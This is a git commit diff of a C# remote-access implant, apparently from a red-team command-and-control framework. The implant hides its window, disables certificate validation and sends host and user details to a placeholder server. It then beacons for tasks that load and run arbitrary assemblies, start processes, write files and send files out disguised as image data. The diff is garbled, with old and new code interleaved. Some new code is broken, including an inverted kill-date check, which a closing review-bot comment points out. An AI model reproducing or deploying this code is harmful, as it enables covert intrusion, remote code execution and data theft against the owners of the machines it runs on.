Update sharp.cs

[+] use of ManualResetEvents instead of Thread.Sleep
[+] Add Jitter to beacontime
[+] General tidy up
chunking
rolen 2019-01-03 18:33:10 +00:00
parent 782429387f
commit 205d4f3693
1 changed files with 432 additions and 493 deletions


@ -16,519 +16,458 @@ using System.Collections.Generic;
public class Program public class Program
{ {
[DllImport("kernel32.dll")] [DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow(); static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")] [DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public const int SW_HIDE = 0; public const int SW_HIDE = 0;
public const int SW_SHOW = 5; public const int SW_SHOW = 5;
public static string scode = ""; public static string scode = "";
public static string proc = @"c:\windows\system32\netsh.exe"; public static string proc = @"c:\windows\system32\netsh.exe";
public static void Sharp() public static void Sharp()
{ {
var handle = GetConsoleWindow(); var handle = GetConsoleWindow();
ShowWindow(handle, SW_HIDE); ShowWindow(handle, SW_HIDE);
AllowUntrustedCertificates(); AllowUntrustedCertificates();
try { primer(); } catch { } try { primer(); } catch { }
Thread.Sleep(300000); var mre = new System.Threading.ManualResetEvent(false);
try { primer(); } catch { } mre.WaitOne(300000);
Thread.Sleep(600000); try { primer(); } catch { }
try { primer(); } catch { } mre.WaitOne(600000);
} try { primer(); } catch { }
}
public static void Main() public static void Main()
{ {
Sharp(); Sharp();
} }
static byte[] Combine(byte[] first, byte[] second)
{
byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
return ret;
}
static System.Net.WebClient GetWebRequest(string cookie) static byte[] Combine(byte[] first, byte[] second)
{ {
var x = new System.Net.WebClient(); byte[] ret = new byte[first.Length + second.Length];
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
string purl = "#REPLACEPROXYURL#"; Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
string puser = "#REPLACEPROXYUSER#"; return ret;
string ppass = "#REPLACEPROXYPASSWORD#"; }
if (!String.IsNullOrEmpty(purl)) {
WebProxy proxy = new WebProxy();
proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
proxy.UseDefaultCredentials = false;
proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
string df = "#REPLACEDF#"; static System.Net.WebClient GetWebRequest(string cookie)
if (!String.IsNullOrEmpty(df)) { {
x.Headers.Add("Host",df); var x = new System.Net.WebClient();
}
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#"); var purl = "#REPLACEPROXYURL#";
x.Headers.Add("Referer", "#REPLACEREFERER#"); var puser = "#REPLACEPROXYUSER#";
var ppass = "#REPLACEPROXYPASSWORD#";
if (cookie != null) if (!String.IsNullOrEmpty(purl))
{ {
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}"); WebProxy proxy = new WebProxy();
} proxy.Address = new Uri(purl);
proxy.Credentials = new NetworkCredential(puser, ppass);
return x; proxy.UseDefaultCredentials = false;
} proxy.BypassProxyOnLocal = false;
x.Proxy = proxy;
}
static string Decryption(string key, string enc) var df = "#REPLACEDF#";
{ if (!String.IsNullOrEmpty(df))
var b = System.Convert.FromBase64String(enc); x.Headers.Add("Host", df);
Byte[] IV = new Byte[16];
Array.Copy(b, IV, 16);
try {
var a = CAMR(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
} catch {
var a = CAMA(key, System.Convert.ToBase64String(IV));
var d = a.CreateDecryptor();
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
} x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
x.Headers.Add("Referer", "#REPLACEREFERER#");
static string Encryption(string key, string un, bool comp = false, byte[] unByte = null) if (null != cookie)
{ x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
byte[] b = null;
if (unByte != null) {
b = unByte;
} else {
b = System.Text.Encoding.UTF8.GetBytes(un);
}
byte[] byEnc = b;
if (comp){
byEnc = Compress(b);
}
try {
var a = CAMR(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
} catch {
var a = CAMA(key, null);
var e = a.CreateEncryptor();
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
byte[] p = null;
p = Combine(a.IV, f);
return System.Convert.ToBase64String(p);
}
}
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV) return x;
{ }
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
b.Mode = System.Security.Cryptography.CipherMode.CBC;
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
b.BlockSize = 128;
b.KeySize = 256;
if (IV != null)
{
b.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
b.Key = System.Convert.FromBase64String(key);
}
return b;
}
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
{
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
if (IV != null)
{
a.IV = System.Convert.FromBase64String(IV);
}
if (key != null)
{
a.Key = System.Convert.FromBase64String(key);
}
return a;
}
static void AllowUntrustedCertificates() static string Decryption(string key, string enc)
{ {
try var b = System.Convert.FromBase64String(enc);
{ var IV = new Byte[16];
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } ); Array.Copy(b, IV, 16);
} try
catch { } {
} var a = CreateCam(key, System.Convert.ToBase64String(IV));
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
catch
{
var a = CreateCam(key, System.Convert.ToBase64String(IV), false);
var u = a.CreateDecryptor().TransformFinalBlock(b, 16, b.Length - 16);
return System.Text.Encoding.UTF8.GetString(u);
}
finally
{
Array.Clear(b, 0, b.Length);
Array.Clear(IV, 0, 16);
}
}
static void primer() static string Encryption(string key, string un, bool comp = false, byte[] unByte = null)
{ {
DateTime now = DateTime.Now; byte[] byEnc = null;
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#"); if (unByte != null)
if (killDate < now){ byEnc = unByte;
//Console.ReadLine(); else
} else { byEnc = System.Text.Encoding.UTF8.GetBytes(un);
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
string key = "#REPLACEKEY#";
var pp = Encryption(key, o);
string baseURL = "#REPLACEBASEURL#";
string s = "#REPLACESTARTURL#";
var primer = GetWebRequest(pp).DownloadString(s);
var x = Decryption(key, primer);
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
Match m = re.Match(x);
string RandomURI = m.Groups[1].ToString();
re = new Regex("URLS10484390243(.*)34209348401SLRU");
m = re.Match(x);
string URLS = m.Groups[1].ToString();
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
m = re.Match(x);
var KillDate = m.Groups[1].ToString();
re = new Regex("SLEEP98001(.*)10089PEELS");
m = re.Match(x);
var Sleep = m.Groups[1].ToString();
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
m = re.Match(x);
var NewKey = m.Groups[1].ToString();
re = new Regex("IMGS19459394(.*)49395491SGMI");
m = re.Match(x);
var IMGs = m.Groups[1].ToString();
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
}
} if (comp)
byEnc = Compress(byEnc);
try
{
var a = CreateCam(key, null);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
catch
{
var a = CreateCam(key, null, false);
var f = a.CreateEncryptor().TransformFinalBlock(byEnc, 0, byEnc.Length);
return System.Convert.ToBase64String(Combine(a.IV, f));
}
}
static System.Security.Cryptography.SymmetricAlgorithm CreateCam(string key, string IV, bool rij = true)
{
System.Security.Cryptography.SymmetricAlgorithm a = null;
if (rij)
a = new System.Security.Cryptography.RijndaelManaged();
else
a = new System.Security.Cryptography.AesCryptoServiceProvider();
a.Mode = System.Security.Cryptography.CipherMode.CBC;
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
a.BlockSize = 128;
a.KeySize = 256;
static byte[] Compress(byte[] raw) if (null != IV)
{ a.IV = System.Convert.FromBase64String(IV);
using (MemoryStream memory = new MemoryStream()) else
{ a.GenerateIV();
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
{
gzip.Write(raw, 0, raw.Length);
}
return memory.ToArray();
}
}
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
{
Random rnd = new Random();
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
byte[] imgBytes = System.Convert.FromBase64String(randimg);
var maxByteslen = 1500;
var maxDatalen = 1500 + cmdoutput.Length;
var imageByteslen = imgBytes.Length;
var paddingByteslen = maxByteslen - imageByteslen;
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
static Random random = new Random(); if (null != key)
a.Key = System.Convert.FromBase64String(key);
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
}
static Type LoadSomething(string assemblyQualifiedName) return a;
{ }
// Throws exception is type was not found static void AllowUntrustedCertificates()
return Type.GetType( {
assemblyQualifiedName, try
(name) => {
{ System.Net.ServicePointManager.ServerCertificateValidationCallback = (z, y, x, w) => { return true; };
// Returns the assembly of the type by enumerating loaded assemblies }
// in the app domain catch { }
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault(); }
},
null,
true);
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
string strURLS = stringURLS.Replace(",",""); static void primer()
strURLS = strURLS.Replace(" ",""); {
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray(); if (Convert.ToDateTime("#REPLACEKILLDATE#") > DateTime.Now)
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray(); {
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
var dn = System.Environment.UserDomainName;
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
int pid = Process.GetCurrentProcess().Id;
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
string strIMGS = stringIMGS.Replace(",",""); var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray(); var x = Decryption(key, primer);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
int beacontime = 5; var re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
var m = re.Match(x);
if (!Int32.TryParse(Sleep, out beacontime)) string RandomURI = m.Groups[1].ToString();
{
beacontime = 5;
}
var strOutput = new StringWriter();
Console.SetOut(strOutput);
bool bExit = true;
while(bExit)
{
Random rnd = new Random();
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
string G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
Thread.Sleep(beacontime*1000);
DateTime now = DateTime.Now;
DateTime killDate = Convert.ToDateTime(KillDate);
if (killDate < now){
bExit = false;
}
string output = "";
try {
string cmd = null;
string x = "";
string tasksrc = "";
try {
cmd = GetWebRequest(null).DownloadString(URL);
x = Decryption(Key, cmd);
x = x.Replace("\0", string.Empty);
} catch {}
if (x.ToLower().StartsWith("multicmd"))
{
string splitcmd = x.Replace("multicmd","");
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
output = "";
//add upload-file
if (c.ToLower().StartsWith("loadmodule")){
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output += "Module loaded sucessfully";
tasksrc = "Module loaded sucessfully";
}
if (c.ToLower().StartsWith("upload-file")){ re = new Regex("URLS10484390243(.*)34209348401SLRU");
string path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase); m = re.Match(x);
string[] splitargs = path.Split(new string[] {";"}, StringSplitOptions.RemoveEmptyEntries); string URLS = m.Groups[1].ToString();
Console.WriteLine("Uploaded file to: " + splitargs[1]);
byte[] fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
if (c.ToLower().StartsWith("download-file")){ re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
string path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase); m = re.Match(x);
byte[] file = File.ReadAllBytes(path.Replace("\"", "")); var KillDate = m.Groups[1].ToString();
byte[] fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString();
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
string dtask = Encryption(Key, c);
string dcoutput = Encryption(Key, "", true, fileChuck);
byte[] doutputBytes = System.Convert.FromBase64String(dcoutput);
byte[] dsendBytes = GetImgData(doutputBytes, stringnewIMGS);
GetWebRequest(dtask).UploadData(URL, dsendBytes);
}
if (c.ToLower().StartsWith("listmodules")){
var appd = AppDomain.CurrentDomain.GetAssemblies();
output += "[+] Modules loaded: \n\n";
foreach (var ass in appd)
{
output += ass.FullName.ToString() + "\n";
}
}
if (c.ToLower().StartsWith("$shellcode")){
string sc = c.Substring(13,c.Length - 13);
sc = sc.Replace("\"", "");
scode = sc;
}
if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe")){ re = new Regex("SLEEP98001(.*)10089PEELS");
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries); m = re.Match(x);
int i = 0; var Sleep = m.Groups[1].ToString();
string method = "";
string splittheseargs = "";
string qualifiedname = "";
string name = "";
foreach (string a in splitargs) {
if (i == 1){
qualifiedname = a;
}
if (i == 2){
name = a;
}
if (c.ToLower().StartsWith("run-exe")) {
if (i > 2){
splittheseargs = splittheseargs + " " + a;
}
} else {
if (i == 3){
method = a;
}
if (i > 3){
splittheseargs = splittheseargs + " " + a;
}
}
i ++;
}
string[] splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
var myList = new List<string>();
foreach (var arg in splitnewargs) {
myList.Add(arg);
}
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
foreach (var Ass in AppDomainAss)
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try {
if (c.ToLower().StartsWith("run-exe")) {
var xxx = loadedType.Assembly.EntryPoint.Invoke(null, new object[] { myList.ToArray() });
output = xxx.ToString();
} else {
try {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { myList.ToArray() });
output = xxx.ToString();
} catch {
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null);
output = xxx.ToString();
}
}
} catch { }
}
}
}
if (c.ToLower().StartsWith("exit")){
bExit = false;
}
if (c.ToLower().StartsWith("start-process")){
string proc = c.Replace("'", "");
proc = proc.Replace("\"", "");
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
Process p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardError = true;
p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output = p.StandardOutput.ReadToEnd();
output = output + p.StandardError.ReadToEnd();
p.WaitForExit();
}
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
if (beacon.ToLower().Contains("s"))
{
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
else if (beacon.ToLower().Contains("m"))
{
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
}
else if (beacon.ToLower().Contains("h"))
{
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
beacontime = beacontime * 60;
beacontime = beacontime * 60;
}
else if (!Int32.TryParse(beacon, out beacontime))
{
beacontime = 5;
}
}
output += strOutput.ToString(); re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
StringBuilder sb = strOutput.GetStringBuilder(); m = re.Match(x);
sb.Remove(0, sb.Length); var NewKey = m.Groups[1].ToString();
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
G = (Guid.NewGuid()).ToString(); re = new Regex("IMGS19459394(.*)49395491SGMI");
URL = baseURL+"/"+URL+G+"/?"+RandomURI; m = re.Match(x);
if (tasksrc.Length > 200) { var IMGs = m.Groups[1].ToString();
tasksrc = tasksrc.Substring(0,199);
} ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
string task = Encryption(Key, tasksrc); }
string coutput = Encryption(Key, output, true); }
byte[] outputBytes = System.Convert.FromBase64String(coutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS); static byte[] Compress(byte[] raw)
GetWebRequest(task).UploadData(URL, sendBytes); {
} using (var memory = new MemoryStream())
} using (var gzip = new GZipStream(memory, CompressionMode.Compress, true))
} catch (Exception e) { {
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)]; gzip.Write(raw, 0, raw.Length);
URL = baseURL+"/"+URL+RandomURI; return memory.ToArray();
string task = Encryption(Key, "Error"); }
string eroutput = Encryption(Key, "Error: " + output + e, true); }
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS); static Type LoadSomething(string assemblyQualifiedName)
GetWebRequest(task).UploadData(URL, sendBytes); {
} return Type.GetType(assemblyQualifiedName, (name) =>
} {
} return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
} }, null, true);
}
internal static class UrlGen
{
static List<String> _stringnewURLS = new List<String>();
static String _randomURI;
static String _baseUrl;
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
internal static void Init(string stringURLS, String RandomURI, String baseUrl)
{
_stringnewURLS = _re.Matches(stringURLS.Replace(",", "").Replace(" ", "")).Cast<Match>().Select(m => m.Value).Where(m => !string.IsNullOrEmpty(m)).ToList();
_randomURI = RandomURI;
_baseUrl = baseUrl;
}
internal static String GenerateUrl()
{
string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
}
}
internal static class ImgGen
{
static Random _rnd = new Random();
static Regex _re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+", RegexOptions.Compiled);
static List<String> _newImgs = new List<String>();
internal static void Init(String stringIMGS)
{
var stringnewIMGS = _re.Matches(stringIMGS.Replace(",", "")).Cast<Match>().Select(m => m.Value);
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m));
}
static string RandomString(int length)
{
const string chars = "...................@..........................Tyscf";
return new string(Enumerable.Repeat(chars, length).Select(s => s[_rnd.Next(s.Length)]).ToArray());
}
internal static byte[] GetImgData(byte[] cmdoutput)
{
Int32 maxByteslen = 1500, maxDatalen = cmdoutput.Length + maxByteslen;
var randimg = _newImgs[(new Random()).Next(0, _newImgs.Count)];
var imgBytes = System.Convert.FromBase64String(randimg);
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(maxByteslen - imgBytes.Length)));
var ImageBytesFull = new byte[maxDatalen];
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
return ImageBytesFull;
}
}
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
{
UrlGen.Init(stringURLS, RandomURI, baseURL);
ImgGen.Init(stringIMGS);
if (!Int32.TryParse(Sleep, out int beacontime))
beacontime = 5;
var strOutput = new StringWriter();
Console.SetOut(strOutput);
var exitvt = new ManualResetEvent(false);
var output = new StringBuilder();
while (!exitvt.WaitOne((int)(beacontime * 1000 * (((new Random()).Next(0, 2) > 0) ? 1.05 : 0.95))))
{
if (Convert.ToDateTime(KillDate) > DateTime.Now)
{
exitvt.Set();
continue;
}
output.Length = 0;
try
{
String x = "", tasksrc = "", cmd = null;
try
{
cmd = GetWebRequest(null).DownloadString(UrlGen.GenerateUrl());
x = Decryption(Key, cmd).Replace("\0", string.Empty);
}
catch
{
continue;
} //CAN YOU CONTINUE FROM THIS POINT?
if (x.ToLower().StartsWith("multicmd"))
{
var splitcmd = x.Replace("multicmd", "");
var split = splitcmd.Split(new string[] { "!d-3dion@LD!-d" }, StringSplitOptions.RemoveEmptyEntries);
foreach (string c in split)
{
tasksrc = c;
if (c.ToLower().StartsWith("exit"))
{
exitvt.Set();
break;
}
else if (c.ToLower().StartsWith("loadmodule"))
{
var module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
var assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
output.AppendLine("Module loaded sucessfully");
tasksrc = "Module loaded sucessfully";
}
else if (c.ToLower().StartsWith("upload-file"))
{
var path = Regex.Replace(c, "upload-file", "", RegexOptions.IgnoreCase);
var splitargs = path.Split(new string[] { ";" }, StringSplitOptions.RemoveEmptyEntries);
Console.WriteLine("Uploaded file to: " + splitargs[1]);
var fileBytes = Convert.FromBase64String(splitargs[0]);
System.IO.File.WriteAllBytes(splitargs[1].Replace("\"", ""), fileBytes);
tasksrc = "Uploaded file sucessfully";
}
else if (c.ToLower().StartsWith("download-file"))
{
var path = Regex.Replace(c, "download-file ", "", RegexOptions.IgnoreCase);
var file = File.ReadAllBytes(path.Replace("\"", ""));
var fileChuck = Combine(Encoding.ASCII.GetBytes("0000100001"), file);
var dtask = Encryption(Key, c);
var dcoutput = Encryption(Key, "", true, fileChuck);
var doutputBytes = System.Convert.FromBase64String(dcoutput);
var dsendBytes = ImgGen.GetImgData(doutputBytes);
GetWebRequest(dtask).UploadData(UrlGen.GenerateUrl(), dsendBytes);
}
else if (c.ToLower().StartsWith("listmodules"))
{
var appd = AppDomain.CurrentDomain.GetAssemblies();
output.AppendLine("[+] Modules loaded:").AppendLine("");
foreach (var ass in appd)
output.AppendLine(ass.FullName.ToString());
}
else if (c.ToLower().StartsWith("$shellcode"))
scode = c.Substring(13, c.Length - 13).Replace("\"", "");
else if (c.ToLower().StartsWith("run-dll") || c.ToLower().StartsWith("run-exe"))
{
var splitargs = c.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
int i = 0;
string method = "", splittheseargs = "", qualifiedname = "", name = "";
foreach (var a in splitargs)
{
if (i == 1)
qualifiedname = a;
if (i == 2)
name = a;
if (c.ToLower().StartsWith("run-exe"))
if (i > 2)
splittheseargs = splittheseargs + " " + a;
else
if (i == 3)
method = a;
else if (i > 3)
splittheseargs = splittheseargs + " " + a;
i++;
}
var splitnewargs = splittheseargs.Split(new string[] { " " }, StringSplitOptions.RemoveEmptyEntries);
foreach (var Ass in AppDomain.CurrentDomain.GetAssemblies())
{
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
{
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
try
{
if (c.ToLower().StartsWith("run-exe"))
output.AppendLine(loadedType.Assembly.EntryPoint.Invoke(null, new object[] { splitnewargs }).ToString());
else
{
try
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, new object[] { splitnewargs }).ToString());
}
catch
{
output.AppendLine(loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.Public | BindingFlags.InvokeMethod | BindingFlags.Static, null, null, null).ToString());
}
}
}
catch { }
}
}
}
else if (c.ToLower().StartsWith("start-process"))
{
var proc = c.Replace("'", "").Replace("\"", "");
var pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
var args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
var p = new Process();
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = p.StartInfo.RedirectStandardError = p.StartInfo.CreateNoWindow = true;
p.StartInfo.FileName = pstart;
p.StartInfo.Arguments = args;
p.Start();
output.AppendLine(p.StandardOutput.ReadToEnd()).AppendLine(p.StandardError.ReadToEnd());
p.WaitForExit();
}
else if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon"))
{
var bcnRgx = new Regex(@"(?<=(setbeacon|beacon)\s{1,})(?<t>[0-9]{1,9})(?<u>[h,m,s]{0,1})", RegexOptions.Compiled | RegexOptions.IgnoreCase);
var mch = bcnRgx.Match(c);
if (mch.Success)
{
beacontime = Int32.Parse(mch.Groups["t"].Value);
switch (mch.Groups["u"].Value)
{
case "h":
beacontime *= 3600;
break;
case "m":
beacontime *= 60;
break;
}
}
else
output.AppendLine($@"[X] Invalid time ""{c}""");
}
output.AppendLine(strOutput.ToString());
var sb = strOutput.GetStringBuilder();
sb.Remove(0, sb.Length);
if (tasksrc.Length > 200)
tasksrc = tasksrc.Substring(0, 199);
var task = Encryption(Key, tasksrc);
var coutput = Encryption(Key, output.ToString(), true);
var outputBytes = System.Convert.FromBase64String(coutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
catch (Exception e)
{
var task = Encryption(Key, "Error");
var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
var outputBytes = System.Convert.FromBase64String(eroutput);
var sendBytes = ImgGen.GetImgData(outputBytes);
GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);
}
}
}
}
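Review bot: The kill-date guard at the top of the new beacon loop in ImplantCore is inverted: `if (Convert.ToDateTime(KillDate) > DateTime.Now)` sets the exit event while the date is still in the future and never fires once it has passed, so the configured end date no longer limits how long the process keeps calling out. The loop it replaces compared `killDate < now`, and primer() in this same commit only proceeds when the kill date is later than the current time, so the two checks now disagree. The guard should read `if (Convert.ToDateTime(KillDate) < DateTime.Now)`. Since this is the only time limit on the loop, it also deserves a comment such as `// containment control: stop all activity once the agreed end date has passed`.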